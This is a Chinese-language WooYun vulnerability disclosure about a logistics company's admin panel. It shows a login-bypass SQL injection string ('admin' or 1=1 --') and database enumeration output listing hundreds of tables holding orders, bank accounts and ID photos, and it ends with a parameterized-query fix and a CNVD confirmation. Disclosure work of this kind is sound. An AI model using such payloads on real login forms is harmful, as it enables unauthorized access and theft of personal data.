当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0214718

漏洞标题:飞特物流某系统后台登录绕过/sql注入(千万用户数据/运单/银行卡号/身份证照片)

相关厂商:飞特物流

漏洞作者: 路人甲

提交时间:2016-05-31 13:23

修复时间:2016-07-17 18:20

公开时间:2016-07-17 18:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-31: 细节已通知厂商并且等待厂商处理中
2016-06-02: 厂商已经确认,细节仅向厂商公开
2016-06-12: 细节向核心白帽子及相关领域专家公开
2016-06-22: 细节向普通白帽子公开
2016-07-02: 细节向实习白帽子公开
2016-07-17: 细节向公众公开

简要描述:

后台登录绕过/sql注入

详细说明:

http://**.**.**.**/manage/admin.aspx
输入admin'报错

QQ截图20160531100621.png


可以绕过(使用低版本ie比如ie6)
用户名

admin' or 1=1 --


密码随意

QQ截图20160531100708.png


QQ截图20160531100806.png


漏洞证明:

同时该处还存在sql注入
13库

QQ截图20160531100357.png


QQ截图20160531101155.png


430张表

QQ截图20160531101321.png


数千万数据

QQ截图20160531100030.png


QQ截图20160531101446.png


QQ截图20160531101726.png


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:
[*] SmtErrorLog, 59062443
[*] MoneyRecord, 39373205
[*] orderDetail, 59062447
[*] haikwanDetail, 34760162
[*] orderParent, 39373211
[*] haikwanParent, 39373280
[*] orderDetailHistory, 39373340
[*] TotalAllImport, 39373451
[*] ReProductPriceRecord, 39373599
[*] ExpressImport, 39373754
[*] ReOrderDeliveryRecord, 39373865
[*] SenderByOrder, 39374318
[*] PostTracesAreaBySpecialType, 39374460
[*] FlytReceiveVolume, 39374559
[*] goodsDetail, 39374676
[*] ReceiveDetail, 39374790
[*] TrackParentOrders, 39374932
[*] OrderHistory, 59062498
[*] OrderPerformanceUser, 39375129
[*] TB_MailFilterList, 39375249
[*] TransitLableListItem, 39375375
[*] FlytLabelPrintHistory, 59062507
[*] OrderSource, 39375561
[*] OrderToTransactionRate, 39375633
[*] OrderToOSOrder, 59062515
[*] T_TestJJ, 39375753
[*] OrderRemark, 39375829
[*] OrderJJOverweight, 39375903
[*] OrderQuantity, 59062525
[*] FlytReceiveTemp, 39376037
[*] RelatePPLToREPORTS, 39376119
[*] OrderListItemType, 39376161
[*] PickTempRecordDetail, 39376205
[*] ReportEubUpWebTime, 39376269
[*] OrderJJTemp_Bak, 39376324
[*] ModifyPostTypeOrders, 39376401
[*] ContactCustomerProgress, 36143082
[*] QualityInspectionItem, 36143090
[*] BatchTransitLableListItem, 36143094
[*] BillReceive, 34760292
[*] ActivitySource, 34760295
[*] customSet, 30097463
[*] OrderCoupon, 59062554
[*] OrderSplitfactor, 36143104
[*] FreightLog, 36143105
[*] CreateTableID, 59062558
[*] FGMSRecordInfo, 36143109
[*] CreateBarCodeToUser, 30097479
[*] Smt_Lin_OrderID, 59062565
[*] ExpTrack, 31516705
[*] goodsParent, 36143119
[*] customSet_20140730, 34760317
[*] ERPCustomCode, 59062575
[*] OrderUsePoints, 59062578
[*] GoodsTransferDetail, 59062580
[*] ChangeTraceOrder, 36143128
[*] QualityInspection, 36143133
[*] TransitNos, 36143136
[*] CarTransportTimeout, 59062587
[*] TransitLableList, 36143141
[*] ReturnOrderListItem, 59062593
[*] OrderBackFreight, 36143146
[*] UPS_DHL_Remote_Area, 30097493
[*] MoneyDelRecord, 59062601
[*] OrderDeceiveLevel, 34760324
[*] BatchTransitLableList, 28624602
[*] CustomerDebtAlertHistory, 28624607
[*] OrdersPrintNumber, 29749202
[*] Outorder, 28624622
[*] UpWebTimeByTraceID, 59062621
[*] BatchPostyPKGDetail, 59062623
[*] BatchPostyDetail, 34760339
[*] BagListItem, 36143175
[*] TwiceReceiptGoods, 59062631
[*] userInfoHistory, 28624653
[*] PostTracesByType, 34760344
[*] FlytSecondaryReceivingInfo, 34760351
[*] PickTempRecordParent, 34760353
[*] VolumeWeightRecord, 31516769
[*] ProfitMarginReport, 36143200
[*] PostCounter_ProductFeature, 31516774
[*] T_WT_ManageLog, 36143206
[*] OrderMatchHistory, 36143209
[*] OrderAuditLog, 59062651
[*] TransportSingleDetail, 34760364
[*] TrackingForCN, 34760366
[*] TrackOrderInfo, 34760369
[*] OrderAutoSplitLog, 34760367
[*] LosingAccountHistory, 36143224
[*] LosingAccount, 34760386
[*] FlytFees, 31516803
[*] MoneyInitializeRecord, 34760385
[*] XMLFileContent, 59062660
[*] eLogisticsOperateHistory, 36143233
[*] SeaRailTransSitDetail, 34760402
[*] Exchange_rateHistory, 59062664
[*] RecordMatchPostType, 36143238
[*] T_TrackOrdersLog, 7112250
[*] FlytUserMailSend, 59062673
[*] MultipleConditionOfPostType, 30097588
[*] TransportSingle, 34760417
[*] postTypeParent, 36143253
[*] userInfo, 36143258
[*] MoneyRecordTime, 7112344
[*] T_WT_Manage, 36143261
[*] CustomsBasedInformation, 34760429
[*] Lostpkg_History, 7112378
[*] OrderBlack, 39376378
[*] RechargePrintRecord, 7112394
[*] userInfo_bak20140926, 34760435
[*] OrderTrackHistory, 7112421
[*] userInfo_bak20140925, 7112431
[*] OrderJJTemp, 34760440
[*] OrderStatusSync, 59062715
[*] ProcessCenterSet, 7112463
[*] UserInfoTrack, 36143287
[*] CustomsClearanceFee, 36143291
[*] Charge, 36143295
[*] ReturnOrderList, 7112519
[*] NoPostal, 59062733
[*] OrderError, 39376409
[*] BatchProcessing, 39376445
[*] OrderToServiceMailSend, 59062738
[*] OrderRecordByPMC, 39376556
[*] tmp_deal_orderData20150922, 39376592
[*] tmp_deal_orderData20150922, 39376628
[*] ChargeByCountry, 39376667
[*] PkgToHongkongUnDelivered, 39376709
[*] Receive_TraceID, 59062751
[*] BatchPosty, 39376745
[*] Lostpkg_Apply, 39376766
[*] PostTypeOptionSortCode, 39376787
[*] InfringementManage, 59062760
[*] FlytZoneByCountry, 39376847
[*] FlytPostZone, 39376874
[*] ShipmentErrorOrder, 59062767
[*] FlytPostRoundingByWeight, 39376919
[*] PostTypeOperatHistory, 39376946
[*] WMSBatchNo, 39376970
[*] FreightSettingLog, 39377000
[*] T_FreiPostOrderBatchNum, 39377021
[*] conditionOfPostType, 36143325
[*] MoneyResetRecord, 39377075
[*] T_GoodsQuestionLog, 59062786
[*] T_ChinaPostSenderInfo, 39377102
[*] OUBShipmentData, 39377120
[*] HKEms_charge, 39377138
[*] PostLimited_RelatedProductLable, 39377162
[*] PostTypeInProcessCenter, 39377195
[*] TransitLableListRelatived, 39377234
[*] BadAccount, 39377255
[*] Temp_RegUserSendMailList, 39377282
[*] SenderInformation, 39377309
[*] QuestionVerify, 39377333
[*] ResponsibilityEvents, 39377360
[*] ErpAutoCheckOrder, 39377382
[*] SMTAccount, 34760577
[*] CMS_News, 36143374
[*] T_FDS_WS_SyncLog, 7113615
[*] T_WT_History, 7113626
[*] CountryByPostType, 34760597
[*] Customerhistory, 59063095
[*] FeesDiscount, 59063118
[*] T_ReturnOrderScanRemarks, 28625563
[*] FlytPostTypeSpecialCost, 59063161
[*] OrderLogisticsFreight, 59063183
[*] PostAndRegeistCharge, 59063201
[*] Charge_Other, 59063219
[*] PostTypeCountryOption, 59063236
[*] tablespaceinfo, 59063247
[*] T_GoodsQuestionManagement, 34760820
[*] PostType_MailTypeByGroup, 59063278
[*] TrackCarrier, 59063289
[*] Usps_labelArea, 59063303
[*] postType, 7116992
[*] CountrySortingNo, 59063320
[*] ConfirmedTag, 59063328
[*] OperHistory, 59063335
[*] countrys, 59063347
[*] NationalRegionCountry, 59063358
[*] PostTypeOptions, 59063368
[*] DataCountryCode, 59063380
[*] OutboundCountryToZone, 31517189
[*] UserAmazonAccount, 39377366
[*] CountryHKAPVolumeMark, 28625954
[*] ReturnMoneryApply, 36143637
[*] T_FreipostCountrys, 59063439
[*] TrackCountry, 36143644
[*] CountrySgEmsSortingNo, 59063463
[*] PostTypeToTrackCarrier, 39377387
[*] PostTypeToTrackCarrier, 59063491
[*] SeaRailTransSit, 39377528
[*] PremiumPriceInProcessCenter, 59063503
[*] FlytSubmitProcessCenter, 39377692
[*] PayPalAdvance, 39377810
[*] ImpExcel, 59063530
[*] ImpExcel, 59063537
[*] ImpExcel, 59063542
[*] GoodsTransfer, 59063549
[*] Printshippingaddressconfig, 59063557
[*] FgmsPrint, 59063565
[*] FgmsPrint, 39378392
[*] csv58039, 59063579
[*] OrderParentExtend, 59063587
[*] csv57880, 59063595
[*] Cost_Charge, 59063601
[*] PerformanceOfTypeDetail, 39378773
[*] ExpressSetting, 39378881
[*] EAExpense, 59063629
[*] csv57822, 39379103
[*] DownLoadHistory, 59063651
[*] OrderErrorCode, 59063661
[*] csv58460, 59063671
[*] csv18981, 39379421
[*] CustomerRankParameter, 39379502
[*] BankAccount, 59063694
[*] BankAccount, 59063704
[*] FlytSetPostVolume, 59063709
[*] FlytSetPostVolume, 59063721
[*] relationOfUserGroup, 39379862
[*] ImTrace, 59063740
[*] HuijiangCNAMGZSenderInfo, 59063747
[*] GroupRelateSeller, 59063760
[*] GroupRelateSeller, 39380213
[*] deliverAddress, 39380292
[*] DeliverBank, 59063791
[*] DeliverBank, 39380460
[*] EADepartment, 59063802
[*] ReturnImport, 36143763
[*] TraceIdQueryCondition, 31517326
[*] EfficiencyReport, 36143769
[*] DGMESCharge, 34760995
[*] usermenu, 28626138
[*] csv70327, 59063859
[*] csv70327, 31517348
[*] Exchange_rate, 36143794
[*] Exchange_rate, 59063880
[*] HKDHLPartTable, 59063892
[*] CustomerParameter, 59063905
[*] ApiSignPlatform, 59063915
[*] ApiSignPlatform, 28626174
[*] ChinaPostPartTable, 59063935
[*] ChinaPostPartTable, 30098161
[*] ChinaPostPartTable, 59063954
[*] ChinaPostPartTableSH, 59063962
[*] csv58365, 34761055
[*] PostTypeInProcessLog, 36143875
[*] DeliverAddressToProcessCenter, 59063987
[*] EAReimburseHistory, 59064001
[*] ChannelNumberMapPostType, 59064007
[*] CrossPostProblemOrder, 59064014
[*] CrossPostProblemOrder, 59064023
[*] CrossPostProblemOrder, 59064034
[*] CrossPostProblemOrder, 59064044
[*] EAReimburseAudit, 59064052
[*] EAReimburseDetail, 59064058
[*] BlackListPay, 36143908
[*] BlackListPay, 59064076
[*] csv19626, 59064086
[*] csv19626, 36143933
[*] MoneyAudit, 36143942
[*] SystemConfig, 34761113
[*] csv20453, 59064135
[*] csv20453, 59064144
[*] EAReimburse, 59064154
[*] EAReimburse, 59064167
[*] GlobalExpressRecord, 59064179
[*] GlobalExpressRecord, 59064191
[*] DHLPartTable, 36143997
[*] GZEMSPartTable, 36144004
[*] MailTypeByGroup, 36144009
[*] PostTypeToStorage, 59064223
[*] OutboundTraceIdFormat, 36144033
[*] OutboundTraceIdFormat, 36144036
[*] PostTypeByGroup, 59064239
[*] ChannelScanHistory, 59064250
[*] ChannelScanHistory, 36144051
[*] EABankAccount, 59064266
[*] ChannelScanListItem, 36144060
[*] ChannelScanListItem, 59064285
[*] ChannelScanListItem, 28626297
[*] ChannelScanListItem, 34761233
[*] ChannelScanListItem, 59064308
[*] NationalRegion, 59064319
[*] csv20531, 59064325
[*] csv21877, 59064330
[*] csv70402, 36144088
[*] csv70402, 59064352
[*] customerRank, 59064362
[*] CustomServiceRecord, 36144108
[*] images, 36144115
[*] images, 36144120
[*] images, 59064388
[*] ChannelScanList, 59064397
[*] EubApiRequester, 59064408
[*] EubApiRequester, 36144133
[*] EubApiRequester, 59064422
[*] EubApiRequester, 59064429
[*] EubApiRequester, 59064440
[*] PerformanceOfType, 59064444
[*] CMS_tbLink, 59064448
[*] CMS_tbLink, 59064455
[*] CMS_tbLink, 59064461
[*] CMS_tbLink, 36144185
[*] CMS_tbLink, 36144190
[*] CMS_tbLink, 59064485
[*] csv17186, 36144202
[*] T_InformationCollectionLibrary, 59064494
[*] ChannelChargeSetting, 59064504
[*] ChannelChargeSetting, 36144220
[*] ChannelChargeSetting, 59064513
[*] ChannelChargeSetting, 36144235
[*] ChannelChargeSetting, 59064525
[*] ChannelChargeSetting, 36144241
[*] csv21199, 59064536
[*] csv21199, 59064544
[*] csv21199, 59064553
[*] csv21199, 34761367
[*] csv70018, 59064572
[*] csv70018, 36144279
[*] csv70221, 59064590
[*] csv70221, 59064601
[*] SetFlytUserToPostTypeWhiteList, 59064611
[*] BlacklistUsers, 59064617
[*] BlacklistUsers, 36144308
[*] BlacklistUsers, 59064632
[*] BlacklistUsers, 59064638
[*] BlacklistUsers, 36144320
[*] BlacklistUsers, 36144334
[*] BlacklistUsers, 7122255
[*] BlacklistUsers, 59064694
[*] BlacklistUsers, 36144346
[*] BlacklistUsers, 39380511
[*] BlacklistUsers, 39380547
[*] BlacklistUsers, 39380595
[*] BlacklistUsers, 59064735
[*] BlacklistUsers, 59064745
[*] BlacklistUsers, 39380819
[*] BlacklistUsers, 39380880
[*] BlacklistUsers, 59064776
[*] BlacklistUsers, 59064785
[*] BlacklistUsers, 39381030
[*] BlacklistUsers, 39381068
[*] BlacklistUsers, 59064803
[*] BlacklistUsers, 39381156
[*] BlacklistUsers, 59064821
[*] BlacklistUsers, 59064833
[*] BlacklistUsers, 39381243
[*] BlacklistUsers, 39381276
[*] BlacklistUsers, 59064858
[*] BlacklistUsers, 39381325
[*] BlacklistUsers, 36144499
[*] BlacklistUsers, 59064881
[*] CMS_NewMenu, 39381393
[*] CMS_NewMenu, 59064898
[*] CMS_NewMenu, 36144531
[*] CMS_NewMenu, 39381462
[*] CMS_NewMenu, 39381480
[*] CMS_NewMenu, 59064923
[*] CMS_NewMenu, 39381519
[*] CMS_NewMenu, 39381549
[*] CMS_NewMenu, 39381575
[*] CMS_NewMenu, 39381600
[*] CMS_NewMenu, 59064950
[*] CMS_NewMenu, 39381636
[*] CMS_NewMenu, 59064965
[*] CMS_NewMenu, 7123442
[*] CMS_NewMenu, 31517982
[*] CMS_NewMenu, 59064988
[*] CMS_NewMenu, 36144597
[*] CMS_NewMenu, 59065002
[*] CMS_NewMenu, 59065008
[*] CMS_NewMenu, 34761585
[*] CMS_NewMenu, 31517996
[*] CMS_NewMenu, 36144639
[*] CMS_NewMenu, 36144666
[*] CMS_NewMenu, 59065109
[*] CMS_NewMenu, 59065112
[*] CMS_NewMenu, 31518049
[*] CMS_NewMenu, 59065124
[*] CMS_NewMenu, 36144688
[*] CMS_NewMenu, 59065143
[*] CMS_NewMenu, 59065152
[*] CMS_NewMenu, 59065159
[*] CMS_NewMenu, 36144702
[*] csv10370, 34761622
[*] csv10370, 36144707
[*] csv10370, 34761626
[*] csv10370, 59065196
[*] csv10370, 59065203
[*] csv10370, 59065212
[*] csv10370, 59065218
[*] csv10370, 34761637
[*] csv10370, 59065234
[*] csv10370, 59065242
[*] csv10370, 7123780
[*] csv10422, 59065258
[*] csv13030, 36144746
[*] csv13030, 36144753
[*] csv13030, 36144762
[*] csv13030, 59065292
[*] csv13030, 36144785
[*] csv13030, 36144794
[*] csv13030, 59065315
[*] csv13030, 59065321


QQ截图20160531102928.png


QQ截图20160531103041.png


QQ截图20160531103338.png


大量身份证图片

QQ截图20160531104038.png


记录里面的有个字段是用来存放用户的身份证照片

QQ截图20160531104303.png


QQ截图20160531104345.png


UserAmazonAccount

QQ截图20160531105250.png

修复方案:

参数化查询,登录页面的登录逻辑得改

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-06-02 18:13

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无